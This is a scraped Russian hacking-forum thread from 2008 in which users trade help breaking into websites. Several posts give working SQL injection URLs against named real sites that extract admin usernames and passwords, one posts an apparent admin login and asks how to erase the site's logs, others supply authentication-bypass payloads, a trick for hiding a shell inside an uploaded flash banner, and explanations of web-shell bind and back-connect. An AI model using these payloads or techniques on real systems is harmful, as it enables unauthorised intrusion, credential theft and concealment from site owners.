Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. none222

    none222 Guest

    Reputations:
    0
    Если баннер заливается (и не в БД) и с любым расширением - то можешь просто в конец флешки записать шелл в хекс-редакторе. Если расширение полюбому SWF, то те нужно именно флешку заливать с определённым кодом (ЭкшенСкрипт) редиректа - это максимум
     
  2. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    не прокатит, потому что это не эксплоит, а шеллкод
     
  3. peonix

    peonix New Member

    Joined:
    8 Nov 2008
    Messages:
    20
    Likes Received:
    2
    Reputations:
    -1
    http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*

    http://www.a-shop.ru/admin
    sergey : q1w2e3
    там есть менюшка с логами , вот как их отчистить?
     
  4. _nic

    _nic Elder - Старейшина

    Joined:
    5 May 2006
    Messages:
    651
    Likes Received:
    54
    Reputations:
    3
    Как можно безпалевно проверить днс сервер на эту http://www.securitylab.ru/vulnerability/355730.php дыру?
     
  5. Sindicat

    Sindicat New Member

    Joined:
    14 Nov 2008
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    Помогите все знаю, но логин и пасс не могу выташить
    _http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat_ws(0x3a3a,column_name),5,6,7+from+information_schema.columns+where+table_name=char(112,111,108,108,95,117,115,101,114)--


    _http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,

    0x3a,userpass),5,6,7+from+poll_user--
     
  6. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    _nic
    Вопрос,как я понимаю, риторический? КАК вообще можно сделать что либо в сети безпалевно?
    Они следят за нами. Всегда! xD
     
  7. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Sindicat
    Я точно не смотрел, но кажется что надо пробить тебе на database(), а потом просто использовать конкатенацию +from+database_name.table_name
    И зачем чарить в конце? Захекси =)
    Честно-лень смотреть. Мог бы и не писать,скажете вы. Но не писать вообще лень =)
    Там же вообще выводится что либо? Принтабельные есть? Т.к. ошибка скачет постоянно...
    Без обид, я немного выпил "за сегодняшний удачный день!" =)
     
    1 person likes this.
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    ThreeD абсолютно прав, мне было не лень )
    http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,%200x3a,userpass),5,6,7+from+d8242sd5804.poll_user--
     
    3 people like this.
  9. Sindicat

    Sindicat New Member

    Joined:
    14 Nov 2008
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    спасибо !!! мне все - ровно не понятно я вывел database() , получил d8242sd15320 - а у тебя получился d8242sd5804 почему так ?
     
  10. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Sindicat
    Видимо таблица poll_user относится к d8242sd5804 а не к d8242sd15320, иначе бы и конкатенацию использовать не пришлось. Не одна база просто, и ты сидишь не под нужной тебе. А используя d8242sd5804.poll_user, ты получаешь инфу из нужной тебе базы, которой является d8242sd5804, к которой и относится таблица poll_user.
    В базе d8242sd15320 таблицы poll_user нет. Юзай concat_ws(0x3A3a,table_schema,table_name)+from+information_schema.tables , чтобы узнать к какой базе относится нужная тебе таблица.
     
    #3730 ThreeD, 19 Nov 2008
    Last edited: 19 Nov 2008
    1 person likes this.
  11. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    На сайте под управлением mssql access есть уязвимость в авторизации.
    пытаюсь скомбинировать как в mssql
    но не получается. Как правильно ввести данные?
     
  12. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Народ объясните что такое в шелле C99 в тулс.....

    Binding port
    Back connection
    Datapipe

    ЧТО ЭТО ВООБЩЕ ТАКОЕ??? если можно то каждую функцию отдельно объясните
     
  13. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Биндшелл, это когда открывается порт на машине.Binding port.
    Бэкконект рулит когда тачка за натом, к твоей тачке коннектит, а ты на свой врубаешь неткат и слушаешь порт, на который должен быть коннект. Хотя я могу ошибаться, но вроде таг =) *пошёл за пивом* ))))
     
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Access не поддерживает комментарии вот это "--" не катит, прочитай наконец статью

    https://forum.antichat.net/threadnav50550-1-10.html
     
  15. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    diznt
    ЭЭЭ. Ёпта, там датапайп исчо...
    Вроде он перебрасывает tcp/ip пакеты на другой хост, любой. Для анонимности типа.
     
    #3735 ThreeD, 19 Nov 2008
    Last edited: 19 Nov 2008
  16. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Это так теория, в твоём случае она не применима, но знать будет полезно (для других БД, к примеру мускул).

    Это зависит только от запроса, т.е. найти вариант, который прокатывал бы в каждой админке с уязвимой авторизацией не реал.

    1. "--" будет служить символом комментария только если после этого чуда идёт пробел, а в админках часто используется обрезание пробельных символов по краям, так что лучше юзать так: "-- 1".

    2. Пробывать лучше это:

    login' or 1=1-- 1
    password' or 1=1-- 1

    3. Часто бывает что без извращений с юнионом в админку по скуле в авторизации не попасть, но тут не видя сорца скрипта сделать что либо почти не реал.

    Хотя в крации расскажу:

    Если авторизации (т.е. проверка правильности введённой инфы) проходит только по результату запроса, то прокатывает посдановка вышеуказанной комбинации.
    А бывает, что из запроса (по логину) достается соотвествующий пароль или хеш пароля, а уже затем он сравнивается с введённым тобою, что то вроде этого:

    Code:
    select password from admin where login = '$login';
    В таких случаях нужно через объединение запросов впихивать левые данные:

    Code:
    логин = 1' and 1=2 union select 'pass'-- 1
    И пароль соответственно = pass
    Ну или есть хеширование:

    Code:
    логин = 1' and 1=2 union select md5('pass')-- 1
    И пароль соответственно = pass
    Но это так теория, на практике это будет геморно осуществить.

    4. Ещё как вариант попробовать раскрутить инъекцию как слепую - тоже частенько удаётся сделать.
     
    #3736 Grey, 19 Nov 2008
    Last edited: 20 Nov 2008
  17. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    В данном случае ты имеешь ввиду посимвольный перебор с использованием подзапросов? Я не сталкивался ни разу с подобным извращением в авторизации. Можно конкретнее (примерчик например )).
     
  18. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    ThreeD а что он слушает то на бек конекте???
     
  19. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    дизнт
    А как ты думаешь? ) Музыку в основном.
     
    1 person likes this.
  20. _nic

    _nic Elder - Старейшина

    Joined:
    5 May 2006
    Messages:
    651
    Likes Received:
    54
    Reputations:
    3
    Ну а как хоть как то чекнуть днс на эту дырку http://www.securitylab.ru/vulnerability/355730.php ???
     
Thread Status:
Not open for further replies.